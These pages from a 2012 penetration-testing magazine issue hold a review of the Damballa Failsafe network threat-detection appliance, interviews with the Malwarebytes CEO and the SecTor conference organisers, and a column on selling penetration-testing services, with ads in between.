Chapter 8 describes debugging with the use of debuggers and how they can be used to walk through a program. Chapter 9 focuses on another very commonly used freeware tool called OllyDbg, which is an x86 debugger. Here you will be given a tour of the GUI, highlighting key functions within the interface. Chapter 10 explains a not so popu-lar debugger by Microsoft that goes by the name of WinDbg. Even though this application is not as preferred as other tools, it does have some unique features that can be used for kernel mode debug-ging

Now that we have made it to part 4, chapter 11 switches focus from malware analysis to malware behavior examining downloaders/launchers, back-doors, RAT, Botnets, and keyloggers to name a few. Chapter 12 covers launching covert malware and how to discover code constructs that will lead us to find the launching techniques that were de-ployed. Chapter 13 dives into data encoding meth-ods that attackers use to hide the true functional-ity of the malicious application. These techniques range from simple encoding to more sophisticated custom. Chapter 14 helps us develop signatures for network-based counter measures by observing data produced by the suspected malware sample.

REvIEW

Page40 http://pentestmag.com08/2012 (16) August

Damballa is a network security company fo-cused on protecting enterprise, ISP and telecommunications networks against ad-

vanced cyber threats, such as advanced malware, APTs, zero-day targeted attacks, and botnets. Dam-balla has been in the market since 2006, the time when APTs and malware were at their naïve states, and the threats could be mitigated with less bud-get flows and pains. Anticipating the growing threat, the company has evolved, developed and refined the Damballa Failsafe solution to stay ahead of the changing threat landscape. Damballa Failsafe is a real-time identification and termination solution for zero-day targeted attack activity that takes place in-side enterprise networks. It is one of the most ap-propriate solutions to address these specific issues and gaps in traditional security.

Compared to malware analysis products that only identify malware entering networks, Dambal-la Failsafe goes the extra mile by identifying ac-tual compromised endpoints. This approach sig-nificantly reduces false positives and streamlines remediation. Many networks have either been at-tacked in the past or are not even aware of their current compromised situation. Damballa Failsafe is rightly tailored to give a wide range of network compromise statistics over a singular dashboard. It detects malicious software and malicious com-

munications, correlates threat behaviors, pinpoints live infections, it then ranks infected assets by se-verity so organizations can dispatch resources ef-fectively.

Based on my experience with Damballa Failsafe (v5.0), I definitely believe that this solution fills the gaps that traditional prevention technology leaves and goes beyond what most malware protection systems are able to provide today. This special-ized threat protection solution is built specifically to identify active hidden threats in a corporate net-work by utilizing an array of patent-pending tech-nologies. It has the capability that:

• Automatically detects and analyzes suspicious executable and PDF files entering the network to uncover zero-day and unknown malware.

• Rapidly identifies command & control (C&C) behaviors and criminal traffic on enterprise networks.

• Correlates the malware and communications evidence to immediately pinpoint live infec-tions.

• Terminates the criminal communications to stop data theft and cyber espionage.

• Delivers full forensic evidence and playback of events in sequence to provide actionable intel-ligence to help remediate a breach.

Damballa Failsafe More Than a Malware Protection System

Advanced malware, persistent threats (APTs), and zero-day targeted attacks are the buzz of today’s security industry. Big and small corporates to vast infrastructures or SMEs are all victims to these stealthy targeted attacks.

Page41 http://pentestmag.com08/2012 (16) August

infections on endpoints become important to avoid unnecessary alerts. The correlation of behaviors seen and generation of a threat conviction score virtually eliminates false positives.

Asset Risk FactorsA very important and useful feature found in the Damballa Failsafe is Asset Risk Factor. This fea-ture assesses the relative risk the infected end-point represents to your specific enterprise based on the activity it performed on the endpoint and in the local network. Some factors in determining risk include:

• Number of Connections and successes• Reputation ratings to the domains• Amount of data transfers – inbound/outbound

for a session state• Number of Malware instances on an endpoint• Anti-virus coverage• Asset profile rating

It is one thing to know that you have an outbreak of SpyEye, it is quite another to know that five of the 20 infected devices have been successful in establishing communications with criminal opera-tors, have access to intellectual property and sit in sensitive location in your network.

In the event of a breach, the dashboard is ca-pable of highlighting the criticality as per the asset. For example, the CTO’s laptop infected with mal-

Key FeaturesActive Threat MonitoringDamballa Failsafe sensors monitor traffic at all the perimeter points, including the egress, proxy /gate-ways, and the outbound DNS requests (see Figure 1). It then utilizes its machine intelligence code to find behavior anomalies in the traffic. This is criti-cal to identifying potential threats and tracking their behavior in the network, and/or to isolating the in-fected host machines.

Damballa Failsafe utilizes anomaly detection al-gorithms along with suspicious activity ratings but requires no malware signatures to identify suspi-cious criminal traffic. Being able to detect malicious network traffic without signatures makes Damballa Failsafe a best-of-breed solution for early detec-tion of malicious activities.

Threat Conviction EngineInstead of alerting on any one behavior, Damballa Failsafe utilizes its Threat Conviction Engine to cor-relate threat behaviors in the network and confirm breaches on endpoints. Behaviors such as suspi-cious files downloaded, malicious DNS queries, domain fluxing and other automated behaviors are tracked, treating each as pieces of evidence of an endpoint being infected. They are weighted and scored, yielding a threat conviction score for any particular endpoint in network. As enterprises em-brace non-Windows devices and platforms in the network (such as Mac, iPad), confirming malware

Figure 1. Damballa Failsafe: Hunts for Advanced Malware, Persistent Threats and Targeted Attacks in Corporate Networks

REvIEW

Page42 http://pentestmag.com08/2012 (16) August

ware and has successful connected to command-and-control servers may have a higher rating than a consultant’s machine infected with the same malware. This feature prioritizes the pipeline of the IT administrator and/or security incident manager in charge.

Sensors and Real-Time Cloud UpdatesDamballa Failsafe incorporates the early warning capabilities of Damballa FirstAlert to discover crim-inal infrastructure used by emerging cyber threats weeks or months before the malware samples are first seen by the rest of the security industry. Dam-balla Failsafe sensors are like spy agents spread across a multiple networks with access to millions of traffic packets around different geo-locations. These sensors monitor and give suspicion rat-ings to the domains, binaries and/or IP addresses. These findings are cumulatively monitored across the globe and uploaded to the Damballa cloud for additional analysis. By combining this early-warn-ing intelligence with observed activity in a custom-er network, Damballa can pinpoint infected assets long before other traditional security solutions will become aware of the threat. Therefore, with this early warning capability, Damballa Failsafe has an edge over other advanced threat detection tech-nologies.

Deep Packet InspectionThe key feature on which everything relies is its deep-packet inspection engine (DPI), which is multi-layered, and has a very low false positive and false negative rate. Most of the industry-standard DPI engines rely on specific signatures of known binary samples therefore; the timeline to detect un-known or zero-day code is too long to save the cut-ting edge and mission critical corporations. With Damballa Failsafe, the sensors are capable of de-tecting the threats utilizing its behavior anomalies in the traffic, as well as the binary analysis of the downloaded files. It includes:

• Automated Malware Analysis – detecting and capturing suspicious executable and PDFs, identifying if they are malicious, and analyzing them at Damballa Labs in real-time to profile their C&C communication behavior and pro-vide host forensic details.

• Behavioral Analysis – tracking the behavior of the asset's communications – identifying if cer-tain communications seem automated or act more like a human.

• Profiling Communications – analyzing network traffic to determine if the destination is suspi-cious, known to be C&C, has a low reputation or is generally shady.

Figure 2. Damballa Dashboard featuring Asset Risk Factor, Threat Conviction Score, Threat Description and Malicious Behavior Detail

08/2012 (16) August

Damballa Failsafe does not remove or quarantine malware, or infected systems, but it can be lev-eraged to provide assistance in isolating the re-source in a vast segregated network. The appli-ance does have a feature to block specific com-mand-and-control (C&C) communications by redi-recting traffic or session interruption so the infect-ed machine can’t communicate with its respective C&C.

Cloud Binary AnalysisDuring review of the Damballa Failsafe appliance, I was pleased to see an excellent binary analysis feature. The present version supports validating binary files that are downloaded over the network, and can be analyzed to a granular view of the sys-tem changes it will perform on installation. It shows the file and the registry changes on a windows sys-tem. This cloud binary analysis helps in identifying the post installation effects and system configura-tion changes. It also helps in identifying malicious programs (if any). In future versions of Damballa Failsafe, a feature to upload “your binary” will also be included for runtime analysis of existing or non-network (like CD and USB) transferred files.

Malicious File DetectionDamballa Failsafe with its current technology sup-ports malware detection using the intelligent ma-chine codes which takes into account the traffic (TCP, DNS) and the targeted domains with suspi-cion ratings. Once a file has been tagged as ma-licious, it is given a name using three words (ex. HighTideSnap) and is continuously monitored against the standard anti-malware solutions. Once the suspicious file is confirmed as known malware, its common industry name is displayed within pa-rentheses (ex. HighTideSnap (KeyLog.Genx)). This is a remarkable feature showing the product’s power and efficiency. It can detect malware using intelligent machine code much before the standard anti-malware companies even tag it. Thus, it is rec-ommended for intelligent zero-day detection.

SummaryWith a comprehensive list of features, and the ca-pability to look into the network and analyze be-haviors, Damballa Failsafe is highly recommended to all CISO who wish to be on the bleeding-edge of security, and stay current on recent advances in anomaly detection and behavior analysis.

Reviewer: Rishi Narang

PC Fix

Before you continue:

Improve PC Stability and performances

Clean you registry from Windows errors

Free scan your Computer now!

INTERvIEW

Page44 http://pentestmag.com08/2012 (16) August

Some might call me a security expert...Interview with Marcin Kleczynski, CEo of Malwarebytes

He started as a computer technician. Frustrated with criminal software he worked on a simple tool. This tool has been downloaded 200 millions times and he is a CEO of a company that stops advanced malware hands down. What is more, he claims his team can make a computer stand on its head and dance. He has got a pilot’s license and is not afraid of Polar Plunge. You cannot miss this interview!

Aby Rao: Please, tell us a little bit about yourself and how you got into security?Marcin Kleczynski: The initial idea for Malware-bytes came about in 2004 when I was working as a computer technician, fixing home computers. Ob-viously, a massive part of this was mending com-puters which had some kind of malware or virus causing them trouble. I would spend hours trying to remove stubborn, troublesome criminal soft-ware. It was here that it all started.

Why malware and how did Malwarebytes come into being?In my computer technician days, the one thing that became more and more apparent to me was that there was a massive amount of criminal software still sneaking past existing antivirus software, steal-ing personal details and sometimes completely wrecking computers. The defining moment came when, despite my laptop running up to date anti-virus software from a major vendor, it to became infected. I had to go onto security forums to seek a solution and that took more than three days. It

then struck me – surely, if I was having this prob-lem as a technician, there must be millions more like me. That was when I first started working on the early version of Malwarebytes Anti-Malware, at the time a simple tool designed to counteract the really troublesome malware which defeated exist-ing antivirus. This was released in 2008, became more complex and really popular and the rest is history.

How big is Malwarebytes and how involved are you with employing new team members? Also, what are some of the fundamental skills you look for in your employees?Malwarebytes has now been downloaded near-ly 200 millions times and has removed billions of pieces of malware around the world. The team is continually growing to support this demand, so we are always looking for good people who have knowledge of the very latest malware trends. For this reason, a lot of our research team is recruit-ed directly from security forums. One of our lat-

est hires has even worked with the Department of Defense – counteracting attempts at cyber-espio-nage. I am still very involved in the recruiting of team members I feel would contribute greatly to our cause.

There are some really big players in the malware market. How do you see Malwarebytes compete with those companies?Malwarebytes often works best when it is used in conjunction with traditional antivirus software, so it’s not necessarily a case of being directly compet-itive. We stop a lot of the threats that these compa-nies miss. We like to say we are ‘complimentary’ to the traditional antivirus vendors.

From a marketing perspective we obviously struggle to compete with the massive marketing budgets these guys have, but when it comes to stopping advanced malware there is no competi-tion, we win hands down.

a d v e r i s e m e n t

PUSHING THE LIMITS

Wei-Meng Lee

iOS 5 Application Development

Programmer to Programmer™U P D A T E D F O R i O S 5

Learn to:

Android TabletApplication Development

Join the discussion @ p2p.wrox.comF U L LY U P D A T E D !

Reto Meier

Professional

Android™ 4Application Development

Jermaine G. Anderson

Flash®, Flex®, and AIR®

Development for Mobile Devices

Programmer to Programmer™p2p.wrox.com

Developing and Deploying Business Applications

“This book is a valuable read for any enterprise CIO and IT leader.”— Mike Blake, Chief Information Offi cer, Hyatt Hotels Corporation

iPad®

in the Enterprise

Nathan Clevenger

Bill HughesIndrajit Chakrabarty

• Choose a development environment anduse Windows Phone 7 developer tools

• Create your own cool and interactiveWindows Phone 7 apps

• Submit and sell your app in theWindows Phone Marketplace

Learn to:

IN FULL COLOR!

Windows® Phone 7Application Development

Making Everything Easier!™

Zhinan Zhou, Robert Zhu, Pei Zheng, Baijian Yang

Windows® Phone 7 Programming for Android™ and iOS DevelopersForeword by Eric Hautala, General Manager, Windows Phone 7, Microsoft Corporation

Lester Madden

Programming for junaio, Layar, and Wikitude

ProfessionalAugmented Reality Browsers for Smartphones

Wrox Programmer to Programmer™Join the discussion @ p2p.wrox.com

AUGMENTED REALITY

TO

NY

MU

LLEN

SERIOUS SKILLS.

PROTOTYPING Designing forthe iPad

Building Applications that Sell

Chris Stevens

Want to Craft KillerCode for mobileapplication?We’ve got a mini-book for that...From Android toApple and everythingin-between…

12–39366

Simply visit www.wiley.com/go/mobdevminibook to download your free copy today

Also available as e-books Develop your knowledge with

Many small businesses think that their security is not targeted because of their size. What are your thoughts?Small businesses are just as much at risk as any-one else, if not more so. These companies still hold a lot of sensitive information and therefore will always be a target. The real problem you have with small businesses is that there is often not a dedi-cated security person, so it can be a bit like the Wild West, with users undertaking all manner of risky practices. Additionally, these companies may not have a budget designed to support software to protect them.

Do you consider yourself a security expert or a security leader or both and why?Some might call me a security expert, but some-times when I see some of the things that my re-search teams are individually capable of, I think I know very little! Those guys could make a comput-er stand on its head and dance.

INTERvIEW

Page46 http://pentestmag.com08/2012 (16) August

How does your software deal with zero-day attacks?Stopping zero-day attacks is the whole point of Malwarebytes. Our technology is not reliant on de-tecting signatures, rather behaviors, so we catch malware by recognizing HOW it is trying to infect a computer. This is called heuristics – which in its simplest form means it spots patterns of behavior. This means we can identify and block entire fami-lies of malware, or even future mutations with a smaller team and more efficient engine.

I am certain a lot of our readers find Malware security fascinating, how can someone start their career in this field?Security forums are the best place to learn about the details of industry from a technical point of view. Online communities like SpyareInfoForum.com is where I started.

How is some of the new media such as

social networks, mobile technology used to spread malware?Whenever you have a lot of people using a particu-lar type of technology it is targeted by cyber-crim-inals, from ARPANET, through to floppy disk, Win-dows and now social media. Facebook and Twitter is now massive so it has become a prime distri-bution mechanism for cyber-criminals. In addition, the most effective forms of malware are ones that prey on the weakest link, people, so social media is a massive contributory factor in this. Mobile mal-ware has been slower to catch on because mobile networks are generally more locked down, how-ever it won’t be long before we see the first mass piece of mobile malware.

If I were to educate my employees about malware, how do I go about doing that and what is the most effective form of education?Unfortunately, all it takes is one weak link – so it’s pretty difficult to make sure your organization is

watertight. I think companies need to write a sol-id Internet use policy and share this with employ-ees, making sure they have understood it properly. Many people are scared to admit if they don’t un-derstand something. The next best thing you can do is make sure people update their antivirus soft-ware, and definitely download Malwarebytes Anti-Malware!

A while ago you mentioned about malware in a bar code. How do you or your team discover such new forms of malware?This was more of a proof-of-concept than reality. It’s hard to discover this type of malware without going around and scanning every barcode in sight. However, you can imagine someone creating a QR code that takes you to a malicious site and then distributing that on printed materials.

What are some of your hobbies and

interests outside IT security?I love aviation, in fact I just received my pilot’s li-cense. I still enjoy programming, though the de-velopment team doesn’t like me meddling in their code.

Are you a regular at the Polar Plunge?This was something my friends begged me to do back in college. It’s been a few years since and I keep coming back for more. This year, the Mal-warebytes team helped me raise hundreds of dol-lars for the Special Olympics!

Interview done by Aby Rao

Practical solutions

to headline threats.

Three days of information security insight.

Only RSA® Conference Europe 2012 delivers the steps and strategies needed to protect your organisation’s assets. From managing smartphones and tablets, to the workplace risks from social media tools, get the techniques you want and the answers you need.

Hear from highly regarded keynotes including Wikipedia founder Jimmy Wales, internationally renowned security technologist Bruce Schneier, and investigative journalist, author and broadcaster Misha Glenny – one of the world’s leading experts on cybercrime and global ma� a networks.

• Leave with actionable solutions

• Build your skills

• Network with like-minded professionals

• Stay informed, stay ahead

Get the practical insight your organisation needs. Attend and play your part in Europe’s most informative information security event.

9

THE GREAT CIPHERMIGHTIER THAN THE SWORD

www.rsaconference.com/pen©2012 EMC Corporation. All rights reserved. RSA, the RSA logo and RSA Conferences are either registered trademarks or trademarks of EMC Corporation in the United States and/or other countries. All other products and services mentioned are trademarks of their respective companies. RSA Security U.K. Limited. Incorporated on June 6, 1996. Company Number: 3208788. Registered O� ce: 1 Carnegie Road, Newbury, Berkshire, RG14 5DJ, England

Find out more at

Hear how the world’s security experts manage challenges like:

• Mobile security

• Data breaches

• Hacktivism

• Cybercrime

• Malware threats

• Cloud computing

Date: 9 - 11 OctoberVenue: Hilton London Metropole Hotel, U.K.

RSA Advert 210x292 Pentest [4.0].indd 1 05/07/2012 19:48

CONFERENCE

Page48 http://pentestmag.com08/2012 (16) August

It Is All About the ContentSecTor Conference

SecTor, the brainchild of founders of TASK, North America’s largest IT security usergroup, started out of the simple desire to bring a security event north of the United States’ border. Now led by an impressive advisory committee composed of leading industry experts, the conference is preparing for its 6th annual event coming this October. Offering a technical and a management track, as well as a remarkable roaster of keynote speakers, it is fair to say that SecTor is well on its way to cement itself as Canada’s premier IT security conference.

M.A. Hervieux: What is your selection process for speakers? Are there topics you favour?Sector: SecTor is all about the content, topics and challenges that matter to Canadian IT Security Professionals today. Of course, we’ll have fun and celebrate having the world’s best in Toronto, but the key to SecTor’s success, and thus the primary objective of the Management Committee and Ad-visory Committee, is quality content and presenta-tion for attendees. Preference is given to speakers who can present new and innovative content to a broad audience. Of course, all presentations are expected to challenge the brightest and quickest of attendees – we wouldn’t have it any other way.

What topics do you feel are not a good match with SecTor? Have you declined speakers based on content you were uncomfortable with presenting?Sector: SecTor is not a vendor focused sales fair. Consequently, there is very little tolerance for com-mercial content within presentations. Attendees

will be encouraged to quell any shameless mar-keting that is not immediately backed up with ratio-nale for its inclusion. The vendors that participate in SecTor year upon year are there to connect with the right people from the Canadian security com-munity – you. We consistently are given feedback by vendors and attendees alike about the value on participation in SecTor and we are keen to main-tain that balance.

What topics/speakers are you particularly excited about this year?Sector: We are excited about our keynotes this year, in particular Kellman Meghu, the local Head of Security Engineering (Canada and Cen-tral US) for Check Point Software Technologies Inc. Kellman’s topic ‘How not to do security: Les-sons learned from the Galactic Empire’ (http://www.sector.ca/sessions.htm#Kellman Meghu) will be both entertaining and full of important se-curity policy and procedure tips. Also exciting, IPv6 Security by Fernando Gont which will focus on the recent advances in IPv6 security. We also

Page49 http://pentestmag.com08/2012 (16) August

have a great lineup already confirmed including topics such as Cybersecurity, Cybercrime, Foren-sics, Mobile security and BYOD. SecTor deliber-ately does not publish a full schedule until just be-fore the conference as our goal is to provide the latest and greatest. Often the feedback we get from attendees is that there is just so much great content to choose from. That is why we also re-cord the sessions and make them available after-wards. Previous sessions can be found at http://www.sector.ca/presentations.

What is your favourite talk of all time?Sector: Johnny Long’s Hacking Hollywood talk in our first year – as a professional hacker by trade, a pirate by blood, a ninja in training, a security re-searcher and author, Johnny brought humour and insight to daily security concerns that are easily overlooked yet could potentially ruin your finan-cial and personal records. He brought it down to a level that anyone could understand and used re-al-world examples such as the info captured from your parking pass, to your garbage/recycling. In subsequent years Johnny has come back to Sec-Tor and shared the work he and others are doing in Uganda and Kenya to help bring technology in to schools. Our attendees have time and again prov-en to be very generous in helping support our cho-sen charities.

What is your favourite security news item of 2012?Sector: 2012 has seen numerous, very public security issues already. Many of them focused around Cybersecurity through persistent attacks by determined adversaries, as well as malware in mobile applications.

However, a member of the local security com-munity, Byron Sonne was back in the headlines recently after being acquitted on all charges lev-elled after the G20 in 2010. One of the opportu-nities of conferences such SecTor is to provide a forum for people to bring to the fore threats, challenges and indeed successes in the security world.

How do you perceive the current trends in security? Where would you like the focus to shift? Sector: The industry has talked for years about a “Defense in Depth” approach to layered security. There is slowly becoming a mindset change from how to stop breaches from occurring towards a realization that bad things can and will happen. The shift is towards what companies do when there is a breach to contain things like informa-

CONFERENCE

Page50 http://pentestmag.com08/2012 (16) August

tion leakage as well as provide clear, timely and transparent communications to customers. This has been demonstrated time and again in recent years, especially where Cloud services are con-cerned, that companies are often remembered not for what happened, but for how a company handled the incident. Ultimately not having good response (as well as proactive security) practices can erode confidence in the company as well as technology as a whole.

How is SecTor helping to accomplish these goals?Sector: By bringing the world’s leading speakers and researchers to Toronto, we address many of today’s security trends and concerns. Our spon-sors are pushed to bring their technical team to the conference, not wear their sales hats, but truly ad-dress these trends. Our demo labs and hands on booths help provide a truly unique experience for attendees.

On our website you’ll notice that many of our ses-sions aren’t announced until right before the con-ference – we do this with the goal in mind that es-pecially in technology, security trends change daily and we don’t want to present material that doesn’t address this constant chance. You know that when you come to SecTor, you’ll be introduced to the se-curity concerns that are affecting businesses today and tomorrow.

How do you perceive Toronto in the security market? Is the security community in Toronto leaders in certain area of the industry? What would you like to see change?Sector: Toronto (and Canada in general) has an enormous amount to offer the world and already plays a significant role on the global stage, from the work that is undertaken on Cybersecurity at the University of Toronto Center for Global Secu-rity Studies and the Citizen Lab to the participation of the Canadian Government and private sectors in cybersecurity collaboration and awareness ac-tivities.

One area of potential growth is towards great-er public / private collaboration. This year the RC-MP’s Dave Black will be returning to SecTor to dis-cuss this topic among other things. Toronto has a significant presence within the international finan-cial sector and continues to actively participate in SecTor each year, helping to further underline their commitment to security.

You offer both a technical, and a management track. If you had to pick one, which would you say draws the most attention? Do you think this is representative of the industry?Sector: The majority of our audience is techni-cal first, and the four (4) technical tracks we run reflect this as our primary focus. Management tracks were added in 2008, to reflect a growing interest, concern and accountability from exec-utives. We track attendance in all our sessions and are often pleasantly surprised to find all ses-sions are well attended – the content is just that good. Many people who come to SecTor have a wide range of interests and IT responsibilities. Our approach to content reflects the consistent feedback we get from our attendees and ven-dors alike by provide real value for coming to SecTor.

If I was indecisive about attending, how would you sell me on the idea that SecTor is the conference for me?Sector: SecTor features keynotes from North America’s most respected and trusted experts and a must attend event for every IT Profession-al. Speakers are true security professionals with depth of understanding on topics that matter. The conference is a great way to come and learn about the latest and greatest in security within a friendly environment, while gaining practice knowledge to help you every day.

SecTorOctober 1-3, Toronto, Canadahttp://sector.ca/default.htm

Interview done by M. A. Harvieux

M.A. HERvIEUxM.A. Hervieux is a CISSP currently employed by one of Canada’s top Telecommunication companies. Deeply passionate about security, he devotes his spare time to pursuing reverse engineering, malware research and a growing addiction to IT certifications.

PAINPIll

Page52 http://pentestmag.com08/2012 (16) August

As a technologist I avoid selling. As a busi-ness owner I live and die by selling. In the movie Glengarry Glen Ross, the character

Blake is this brutal, successful guy who rips into all the other salesmen. The movie is really depress-ing; it is about doing anything to get a sale. Blake says one thing that has stuck with me all these years. “A-B-C. A-Always, B-Be, C-Closing. Always be closing, always be closing.” I take the good and leave the bad. What I take away: You may think you are not a salesperson, but you better learn to be one or your butt will be out on the street. You better get good at it, because your organization needs to know what the next opportunity is now. Who is better than you to see where the customer needs are?

It happened to me at a large firm. They sent me in to teach a simple one-day course. As I was get-ting to know the students, I started asking ques-tions about why they were there. It turned out that the one-day course turned into a week, and that turned into four weeks. The sales person as-sumed they needed a one-day and sold it. He never asked what they needed tomorrow or the next day.

It is not enough to perform the service of pen testing; you must be looking for the opportunity to sell more of your services to the same customer.

You are looking to satisfy as many of their needs that you can: Sell more penetration testing, se-curity services, consulting, anything that is a fit between you and the client. It may be that you need to wait until next year to get the additional business.

I have waited as many as five years for the client to get it together to choose the next service. But he remembered. What was amazing was he replied to my follow-up email that he kept from FIvE YEARS earlier.

So I have told you what to do; now I need to tell you how to do it.

Cold Call vs. Hot lead The big difference between what you are doing and what a saleperson does is cold calls versus hot leads. Cold calling is lead creation from noth-ing. It is walking up to a stranger and convincing them to buy. A hot lead is leveraging preexisiting relationships and meetings. Cold calling is when you want the customer, and a hot lead is when the customer wants you. It is much easier when the customer wants you. They are willing to listen. You already have their attention. You typically have a check or paid invoice. So there is no billing, part-nering, negotiating, or political reasons for them NOT to buy.

Selling Services of Penetration TestingAs you are doing your test, you ARE doing the sales activity. Your task is difficult because you sell intangible – you are selling TRUST. You are saying, “Please trust us enough to attack your network.” What is worse, is you can lose trust in the blink of an eye. Don’t blink. Don’t abuse that trust. Eventually you will get the sale.

Page53 http://pentestmag.com08/2012 (16) August

Salespeople overcome those objections and reasons not to buy. You are not a salesperson, but you can help the salesperson. Then you get to keep doing what you love and sales people will start sending you gifts.

If you are any kind of a technologist, you typi-cally do not have the social skills to do cold calls on a regular basis. Make no mistake, you are not a salesperson unless you cold call as a part of your daily routine. If you think you do not need the salesperson, try doing cold calls, two per day for 30 days. If you make it to day 29 and that phone doesn’t feel like it weighs 100 kilos, change to sales. If you don’t understand how a phone would weigh 100 kilos, I suggest you ask a salesperson.

If you do make it through 30 days, now multiply that effort by 100. That is what a salesperson does for you. You can help with hot lead detection; you probably should not be cold calling.

Sales 101 –relationship building In order to sell you must build a positive relation-ship with someone. I have heard that many poten-tial customers will do a social or sports activity to see how the salesperson reacts in a stressful situ-ation. The theory is if they are a jerk on the golf course, they are going to be the same when writ-ing the deal. Past that stage, be careful: you are trading on the relationship that the salesperson has built.

You start by interacting. Professionalism and friendliness are your watch words. In your case the salesperson should have handed this person off in a formal manner such as an introduction or meet-ing. You can crush the next sale by being a pain. Being good at what you do is not enough.

If you are not good at interacting, learn per-sonality types and know what motivates those personality types. Learn your personality type. Practice with the salesperson or your family. Know how to give a true compliment. Seek to un-derstand, then be understood. There are many books on this.

Social media is not an interactionSocial media does not get you a relationship. So-cial media is marketing. No amount of posting to a forum is going to convince someone to buy a ser-vice. They may take something for free. They may attend your webinar. Social media may convince someone to buy a product, but not a service. In the near future this may change.

Fast forwardThis is where we skip over the basics of leads, marketing, sales funnels, customer relationship management and how to connect with a new cus-tomer. I did not want to leave this out entirely be-cause non-salespeople take these activities for granted. All of this is very important, but we are way past that. You have the first sale.You are try-ing to get the second sale or pave the way for the salesperson.

You are selling a high risk serviceYou are selling an intangible. Products are tangi-bles. If they can see it or touch it, they do not need to worry about risk. If the customer does not like a product, they can return it. There are strict laws around tangibles. Ser-vices are a com-pletely different story. That is why the con-tracts for penetra-tion tests are much more detailed.

You cannot show someone what a penetra-tion test looks like or what the result is going to be. They may ask you for a past re-port. They may know your general process. This is where the risk of a service causes problems with a sale. They may have other expectations. You should confirm their expectations. Let them talk. This is the same way you build a relationship.

On the other side, you do not want to give your service away. In some cases it is very easy to do what you do if you have years of ex-perience. Knowing when to push the right button at the right time looks easy to an outsider. Your service must have value. The risk of someone else doing this who is not as knowledgeable as you, breeds doubt in the customer’s mind. That

PAINPIll

Page54 http://pentestmag.com08/2012 (16) August

doubt translates to risk. A known level of risk that has been accepted is a good thing for your next service you offer. There is a linking from one ser-vice to another. This linking is to your advantage in your sale. Sometimes this linking is misnamed as customer loyalty. They are not loyal, they are risk averse.

You are selling trustIt is very difficult to gain the trust of an organiza-tion. This is especially true for penetration testing. You are saying, “Please trust us enough to attack your network.” Trust is your most valuable asset. Not knowledge. Not skill. Not technology.

I just had a discussion with a customer that I re-ally like. She is well versed in security and she is a really good person. We have done other business together and now she asked me to do a test for her. In our first conversation she told me that it was very important that I knew that she was choos-ing me because she trusted me. It makes me ex-tra vigilant. The other vendor may have more skill than me, but I have the job.

I have another customer who is going to let me do something I have never done before because he trusts me. He knows that I will protect his as-sets from harm. Think about it. I am going to do something that is innately harmful, that I have nev-er done before, and he is paying me to do it. Why? Because he knows I will always do the right thing for his company.

What is worse is you can lose trust in the blink of an eye. Don’t blink. Don’t abuse that trust. Fa-vor the lack of a sale and the gain of trust every day. Eventually you will get the sale. It may take years. This is a mistake new salespeople make all the time. They treat the customer like toilet paper.

Still don’t know how to sell?As you are doing your test, you ARE doing the sales activity. You are paying attention to what the network looks like. Seeing where the weak-nesses are located. Knowing that certain assets are outside the scope gives you power to sug-gest that the next scope or the next project in-clude that asset. Knowing that you could get in the other way means there is more to do the next time.

Take careful notes on all these out-of-scope items. These are your hot buttons for next time. There is the sale. How you bring that information to the customer’s attention is the close.

The CloseIf you have never done this before, practice with your salesperson. DO NOT screw up the sale by practicing on the customer. Remember those gifts from above? They become beatings if you lose the sale. The close is the end of the sale. People wreck the sale by getting to the end and doing too much.

The process to close is:

• Ask questions that the client can answer. • Put them in an uncomfortable position of know-

ing they have a problem. • Show them they need a service and they have

a problem. • SHUT UP! WAIT for them to ask you how to

solve this problem. • Wait for it… Wait for it… They will ask.• Let them know that you have a solution- NOT

what the solution is.• If they buy your solution, you will solve the

problem.

As technologists we see problems and we want to solve them. You lose if you solve the problem before getting money. This is where salespeople want to smack us. Do not tell the customer what the problem is. They need to be led to it so that they may draw their own conclusion and ask their own questions. Don’t tell the customer that you can solve the problem.

They want to know that you need to work for the answer. If they think that the solution takes no ef-fort or time, it has no value. Do not tell the cus-tomer that you have a solution, because they will say, “tell me,” and it looks like you are withhold-ing information. Your magic words are, “I think we can help, but I need to investigate. Investigation takes time.”

I used to think this was manipulation. It could be, but not the way I am intending here. You nev-er wish to offend your customer by implying they have been doing business incorrectly and there is an obvious solution. Nobody wants to feel dumb. Additionally, you always wish to give yourself the time to think about your solution fully. Letting the customer know you have a solution that you wish to research is simply prudent. By letting the cus-tomer ask for help at steps 4 and 5, we respectfully let them lead.

New skills = New things to sellThe good news is penetration testing is not go-ing away, but it may change. Your skills will grow.

08/2012 (16) August

The customer may hire you to do this asset or that scope. Keep all those past customers in your head as you learn the new skill. When are you are ready to try that new skill, follow up with the customer and tell them what you have learned and how this applies to their business.

They may not need you for that new skill, but now you have created a new conversation. Be-cause you took the time to remember their situ-ation in their network, you may get to do the old test over again. For example, they gave your last report to management.

Management may have lined the bottom of the bird-cage with your report. But that pen test re-quirement has come up again, and they are think-ing of you. Your new skill may translate into repeat business.

SummarySales is really about relationships. Relationships take time. Every interaction in a penetration test is time with the customer. The customer may not see the true flaws in their network or business pro-cess. Your investigation and communication with the customer will yield unexpected avenues that greatly benefit everyone. It is very difficult for peo-ple to change their trust to an unknown.Your job is to honor their trust, and provide good services.

Solution selling on Amazon: http://www.amazon.com/Solution-Selling-Creating-Difficult-Markets/dp/0786303158.

Glengarry, Glen Ross on IMDB: http://www.imdb.com/character/ch0012005/quotes.

DEAN [email protected]. Dean Bush-miller is a penetration tester and a trainer for the CEH, CISSP, ISSMP and ISSAP for Expanding Security. Signup for our free weekly security Painpill http://www.expand-ingsecurity.com/painpill.

16th INTERNATIONAL SECURITY AND RFID EXHIBITION16th INTERNATIONAL FIRE,EMERGENCY RESCUE EXHIBITION

SMART HOUSES AND BUILDING AUTOMATION EXHIBITION

OCCUPATIONAL SAFETY AND HEALTH EXHIBITION

INFORMATION, DATA AND NETWORK SECURITY EXHIBITION

The Most Comprehensive Exhibitionof the Fastest Growing Sectors of recent years

in the Center of Eurasia

SEPTEMBER 20th - 23rd, 2012 IFM ISTANBUL EXPO CENTER (IDTM)

THIS EXHIBITION IS ORGANIZED WITH THE PERMISSIONS OF T.O.B.B.IN ACCORDANCE WITH THE LAW NUMBER 5174.

READ

Page56 http://pentestmag.com08/2012 (16) August

Before undertaking a critical medical procedure such as an operation, doctors first focus on making a correct diagnosis. MRI and CAT scans

are essential tools in the field of medical diagnostics because they are non-invasive, fast, easy to admin-ister, relatively lowcost, and they provide immediate results. For these same reasons database SRC pro-grams should always start with a vulnerability scan (an MRI of your database, metaphorically speaking).

